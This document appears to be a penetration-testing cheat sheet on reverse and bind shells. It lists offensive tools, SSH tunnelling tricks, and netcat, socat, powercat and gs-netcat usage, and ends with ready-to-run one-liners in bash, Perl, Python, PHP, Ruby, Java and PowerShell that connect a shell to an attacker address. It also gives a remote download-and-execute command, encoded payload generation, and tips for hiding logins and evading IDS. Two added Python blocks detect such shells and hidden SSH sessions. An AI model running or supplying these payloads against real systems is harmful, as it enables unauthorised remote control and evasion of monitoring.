Shells
Shell Guides and Resources
Upgrading a shell
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Reverse shell Upgrade to Fully interactive - Linux
Method 1
Simply append 2>&1 to the end of the command so that stderr is redirected into stdout and comes back over the connection.
Method 2
(Victim) # python -c "import pty; pty.spawn('/bin/bash')"
(Victim) # export TERM=xterm
(Victim) Now press Ctrl+Z to background the reverse shell
(Attacker) # stty raw -echo; fg
(Victim) # reset
If the terminal looks wonky, match the rows and columns to your own terminal:
(Attacker) # stty size
(Victim) # stty rows [#] columns [#]
Method 3
# sudo apt install rlwrap
# rlwrap nc -lvnp [port]
# stty raw -echo; fg
Method 4
Use Socat
Shell Collections
Impacket remote execution scripts
psexec.py: PSEXEC like functionality example using RemComSvc
smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require installing any service/agent on the target server. Runs as Administrator. Highly stealthy.
dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
BlackArch Web Shells - Shell collection included in the BlackArch Linux distribution
Python PTY shells - Collection of full PTY shells in python
Operator Handbook: Reverse Shells - pg. 267
Misc Shells and Tools
dbd - dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.
sbd - sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only.
Reverse Shell and Post Exploitation tool - RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.
Reverse Shell Generator - Cheater tool to generate reverse shell one liners
ShellPop - With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.
SQL webshell - Webshell that can run command line actions on the target as well as interact with an MSSQL database on the target.
Shellerator - Simple CLI tool for the generation of bind and reverse shells in multiple languages
donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
golang-github-binject-go-donut - This package contains the Donut Injector ported to pure Go.
ibombshell - This package contains a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation).
Weevely webshell - Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
PyShell - Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells, the main goal of the tool is to use as little code as possible on the server side, regardless of the language used or the operating system of the server.
SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications
SSH
Basic use: # ssh [user]@[host]
Use a specific key and port: # ssh -i ~/.ssh/id_rsa -p [port] [user]@[host]
SOCKS proxy: # ssh -D8080 [user]@[host]
Execute a one-line command: # ssh -i ~/.ssh/id_rsa [user]@[host] "command string"
Local port forward: # ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote port forward: # ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
SSH tunnel through T1 to T2: # ssh [user]@[T1 IP] -L [Local LPORT]:[T2 IP]:[T2 LPORT] -R [Local LPORT 2]:[Local IP]:[T1 LPORT]
Almost invisible SSH
ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i"
This will not add your user to the /var/log/utmp file, so you won't show up in the w or who listings of logged-in users. It bypasses .profile and .bash_profile as well. On the client side it stops recording the server in ~/.ssh/known_hosts.
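A defender's check for the situation just described, added here as an example and not part of the original page: correlate the logins sshd accepted with the utmp view that `who` shows, and flag open sessions that sshd authenticated but utmp never recorded. The sshd log lines and `who` output are constructed; the regexes follow the standard OpenSSH syslog wording.

```python
import re

# Constructed sshd log excerpt (syslog prefix trimmed); wording follows OpenSSH.
SSHD_LOG = """\
Accepted publickey for alice from 10.0.0.5 port 51234 ssh2: ED25519 SHA256:constructed1
Accepted publickey for bob from 10.0.0.9 port 40222 ssh2: ED25519 SHA256:constructed2
Accepted password for carol from 203.0.113.7 port 33010 ssh2
Disconnected from user bob 10.0.0.9 port 40222
"""

# Constructed `who` output captured at the same moment as the log excerpt.
WHO_OUTPUT = """\
alice    pts/0        2024-05-01 09:12 (10.0.0.5)
"""

ACCEPT_RE = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
DISCONNECT_RE = re.compile(r"Disconnected from user (?P<user>\S+) (?P<ip>\S+) port (?P<port>\d+)")
WHO_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s+\S+ \S+ \((?P<ip>[^)]+)\)")

def accepted_sessions(log):
    """(user, ip, port) of logins sshd accepted that have not yet disconnected."""
    open_sessions = set()
    for line in log.splitlines():
        if m := ACCEPT_RE.search(line):
            open_sessions.add((m["user"], m["ip"], m["port"]))
        elif m := DISCONNECT_RE.search(line):
            open_sessions.discard((m["user"], m["ip"], m["port"]))
    return open_sessions

def utmp_sessions(who_output):
    """(user, ip) pairs that utmp knows about, parsed from `who` output."""
    return {(m["user"], m["ip"]) for line in who_output.splitlines()
            if (m := WHO_RE.match(line))}

def hidden_sessions(log, who_output):
    """Open SSH logins with no utmp entry: either a -T (no PTY) session that
    skipped utmp, or a long-running non-interactive job such as an scp transfer,
    so treat hits as triage candidates rather than proof."""
    visible = utmp_sessions(who_output)
    return sorted(s for s in accepted_sessions(log) if (s[0], s[1]) not in visible)

if __name__ == "__main__":
    for user, ip, port in hidden_sessions(SSHD_LOG, WHO_OUTPUT):
        print(f"accepted by sshd but absent from utmp: {user} from {ip} port {port}")
```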
SSH tunnel OUT
We use this all the time to circumvent local firewalls and IP filtering:
ssh -g -L31337:1.2.3.4:80 user@server.org
You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80, appearing with the source IP of 'server.org'. An alternative that does not need a server is to use gs-netcat.
SSH tunnel IN
We use this to give access to a friend to an internal machine that is not on the public Internet:
ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org
Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative that does not need a server is to use gs-netcat.
SSH socks4/5 OUT
OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.
ssh -D 1080 user@server.org
Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through server.org and will appear with the source IP of server.org. An alternative that does not need a server is to use gs-netcat.
SSH socks4/5 IN
This is the reverse of the above example. It gives others access to your local network or lets others use your computer as a tunnel end-point.
ssh -g -R 1080 user@server.org
Others configure server.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to, including computers behind your firewall on your local network. An alternative that does not need a server is to use gs-netcat.
Netcat - The original shell tool.
Set Listener
# nc -nlvp [port]
Connect to port
# nc -nv [ip] [port]
Push a file over netcat
#nc -nv [ip] [port] < /full/path/to/file.exe
Catch a pushed file and write it to new file
#nc -nvlp [port] > incoming.exe
Launch command upon connection
#nc -nlvp [port] -e cmd.exe
Upgrade a non-interactive shell
Check python version in /usr/bin
# python2.6 -c "import pty; pty.spawn('/bin/bash')"
Reverse shell
TARGET # nc [ip] [port] -e /bin/bash
ATTACKER # nc -n -vv -l -p [port]
Netcat with GAPING_SECURITY_HOLE disabled
When the netcat build has no -e option (execute a command after connect), use a named pipe on the filesystem to feed what netcat receives into /bin/bash and send the shell's output back through netcat:
TARGET # mknod backpipe p && nc [ip] [port] 0<backpipe | /bin/bash 1>backpipe
ATTACKER # nc -n -vv -l -p [port]
Netcat without netcat (/dev/tcp)
TARGET # /bin/bash -i > /dev/tcp/[IP]/[port] 0<&1 2>&1
ATTACKER # nc -n -vv -l -p [port]
Netcat without netcat or /dev/tcp
TARGET # mknod backpipe p && telnet [ip] [port] 0<backpipe | /bin/bash 1>backpipe
ATTACKER # nc -n -vv -l -p [port]
Linux listener bind shell, executes /bin/sh on connection
# mkfifo /tmp/f; nc -lvnp [port] < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
Operator Handbook: Netcat - pg. 209
Socat - The upgraded and encryptable Netcat
https://github.com/3ndG4me/socat - Socat standalone binary collection
Socat - establishes two bidirectional byte streams and transfers data between them
Bind shell - Linux connect to IP and Port
# socat TCP:[ip]:[port] EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Bind shell - Windows connect to IP and Port
# socat TCP:[ip]:[port] EXEC:powershell.exe,pipes
Sets listener on port
# socat TCP-L:[port]
Sets listener with stable shell
# socat TCP-L:[port] FILE:`tty`,raw,echo=0
Shares file on port
# socat TCP-L:[port],fork file:[file name]
Encrypted shell
Uses open ssl to create a self signed cert and encrypt
# openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# cat shell.key shell.crt > shell.pem
Reverse shell listener (attacker side)
# sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0
Reverse shell connection (target side)
# sudo socat OPENSSL:[ip]:[port],verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Bind shell
# socat OPENSSL-LISTEN:[port],cert=shell.pem,verify=0 EXEC:cmd.exe,pipes (Target)
# socat OPENSSL:[ip]:[port],verify=0 - (Attacker)
Powercat - Netcat: The PowerShell version (PowerShell version 2 and later supported)
Enabling PowerShell script execution
When presented with a User Account Control prompt, select Yes, then enter Set-ExecutionPolicy Unrestricted.
Script we can download to a windows host to leverage Powershell and simplify shells
Install on linux
#apt install powercat
Places the script in /usr/share/windows-resources/powercat
Set up
With the script on the target host, we start by using a PowerShell feature known as Dot-sourcing to load the powercat.ps1 script. This will make all variables and functions declared in the script available in the current PowerShell scope. In this way, we can use the powercat function directly in PowerShell instead of executing the script each time.
>. .\powercat.ps1
If the target machine is connected to the internet, we can do the same with a remote script by once again using the handy iex cmdlet:
> iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Powercat file transfers
Set up a listener on the attacker's Kali instance
# sudo nc -lnvp 443 > receiving_powercat.ps1
Invoke powercat on the sending Windows machine
> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
-c specifies client mode and the address to connect to
-p is the destination port
-i indicates the local file that will be transferred remotely
Reverse shells
> powercat -c [dest ip] -p [dest port] -e cmd.exe
Bind shells - listener
> powercat -l -p [listener port] -e cmd.exe
Stand Alone Payloads
Save the powercat functionality together with the given command as a standalone script using -g
> powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1
> ./reverseshell.ps1
Warning: these scripts are rather large and contain hard-coded strings that will set off an IDS.
Powershell can execute Base64 encoded commands
We can use the -ge option when redirecting to an output file.
> powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
Because of how PowerShell handles encoded commands, you cannot execute the new script as is; instead pass its contents to powershell.exe:
> powershell.exe -E [encoded command string]
This package contains Netcat on steroids with firewall and IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and it is fully scriptable with Python (PSE).
Connect like there is no firewall. Securely. The Global Socket Toolkit allows two users behind NAT/firewall to establish a TCP connection with each other. Securely. More on https://www.gsocket.io.
gsocket resources
The Global Socket Toolkit comes with a set of tools:
gsocket - Makes an existing program (behind firewall or NAT) accessible from anywhere in the world. It does so by analyzing the program and replacing the IP-Layer with its own Gsocket-Layer. A client connection to a hostname ending in '*.gsocket' then gets automatically redirected (via the GSRN) to this program.
gs-netcat - Netcat on steroids. Turn gs-netcat into an AES-256 encrypted reverse backdoor via TOR (optional) with a true PTY/interactive command shell (gs-netcat -s MySecret -i), integrated file-transfer, spawn a Socks4/4a/5 proxy or forward TCP connections or give somebody temporary shell access.
gs-sftp - sftp server & client between two firewalled workstations (gs-sftp -s MySecret)
gs-mount - Access and mount a remote file system (gs-mount -s MySecret ~/mnt/warez)
blitz - Copy data from workstation to workstation (blitz -s MySecret /usr/share/*)
...many more examples and tools.
Reverse shell with gs-netcat
Use gs-netcat. It spawns a fully functioning PTY reverse shell using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect, so you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a Swiss army knife, then gs-netcat is a German battle axe :>
gs-netcat -s MySecret -l -i # Host
Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed.
To connect to the shell from your workstation:
gs-netcat -s MySecret -i
Use -T to tunnel through TOR.
Shell One-Liners
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Netcat without the -e flag
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
Netcat
#nc -e /bin/sh 10.10.10.10 4443
Netcat windows
#nc -e cmd.exe 10.10.10.10 4443
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
Powershell - reverse shell
>powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Powershell Bind shell
>powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
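From the detection side, the one-liners collected above share a handful of recognisable shapes. The following is an added example, not code from the original page: a small rule set derived from those shapes, run over a constructed snapshot of process command lines such as `ps -eo args` or an EDR process-creation feed would provide.

```python
import re

# Each rule is (name, regex over the full command line). The patterns mirror
# the one-liners above: /dev/tcp redirection, mkfifo/mknod back-pipes into a
# shell, nc/socat/powercat -e execution, socat EXEC:, pty.spawn upgrades,
# socket+dup2 chains and the PowerShell TcpClient/GetStream/iex loop.
RULES = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\S+")),
    ("fifo back-pipe into shell", re.compile(r"\b(mkfifo|mknod)\b.*\|\s*(/bin/)?(ba)?sh\b")),
    ("nc/socat/powercat -e exec", re.compile(r"\b(nc|ncat|netcat|socat|powercat)\b.*\s-e\s+\S*(sh|cmd\.exe|powershell)")),
    ("socat EXEC shell", re.compile(r"\bsocat\b.*EXEC:")),
    ("pty.spawn tty upgrade", re.compile(r"pty\.spawn\(")),
    ("socket dup2 chain", re.compile(r"socket\(.*dup2\(.*dup2\(")),
    ("powershell TcpClient iex loop", re.compile(r"TcpClient\(.*GetStream\(\).*\biex\b", re.I)),
]

def classify(cmdline):
    """Return the names of every rule the command line matches ([] if nothing fires)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Map each command line that fired at least one rule to its rule names."""
    return {c: hits for c in cmdlines if (hits := classify(c))}

# Constructed snapshot: one-liners from this page mixed with benign lines that
# share tokens with them (nc without -e, a fifo that is not piped into sh).
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f",
    "nc -e /bin/sh 10.10.10.10 4443",
    "python -c \"import pty; pty.spawn('/bin/bash')\"",
    "socat TCP:10.0.0.1:4444 EXEC:bash -li,pty,stderr,sigint,setsid,sane",
    "nc -lvnp 8080 -e cmd.exe",
    "sshd: alice [priv]",
    "nc -zv db.internal 5432",
    "mkfifo /var/run/app.fifo",
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(hits)}: {cmd}")
```

Command-line matching is cheap but brittle against renamed binaries or base64-wrapped payloads (see the -ge option above), so pair it with a check for shell processes whose stdin/stdout are sockets.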